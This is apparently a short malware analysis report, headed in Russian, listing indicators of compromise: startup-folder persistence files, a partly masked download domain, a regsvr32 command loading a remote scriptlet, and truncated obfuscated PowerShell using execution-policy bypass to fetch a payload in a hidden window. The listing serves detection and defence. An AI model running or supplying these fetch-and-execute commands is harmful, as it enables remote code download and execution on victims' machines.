Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\appventsubsystemcontroller.url
- http://wg###llestig.at/libraries/cms/editor/00/david.exe
- '<SYSTEM32>\regsvr32.exe' -s /n /U /I:http://wg###llestig.at/libraries/cms/editor/00/david.sct sCRObJ.Dll
- %WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe
- %APPDATA%\davids.exe
- %HOMEPATH%\appventsubsystemcontroller\appventsubsystemcontroller.vbs
- %HOMEPATH%\appventsubsystemcontroller\ktmutil.exe
- http://wg###llestig.at/libraries/cms/editor/00/david.sct
- http://wg###llestig.at/libraries/cms/editor/00/david.exe
- DNS ASK wg###llestig.at
- '%APPDATA%\davids.exe'
- '<SYSTEM32>\cmd.exe' "/c PoWErsheLL.exe -EX BYpaSS -nOP -W 1 SeT-conTenT -VA ( new-ObjeCT Net.wEBCLIEnt ...' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' -s /n /U /I:http://wg###llestig.at/libraries/cms/editor/00/david.sct sCRObJ.Dll' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c PoWErsheLL.exe -EX BYpaSS -nOP -W 1 SeT-conTenT -VA ( new-ObjeCT Net.wEBCLIEnt ...
- '%WINDIR%\microsoft.net\framework\v2.0.50727\msbuild.exe'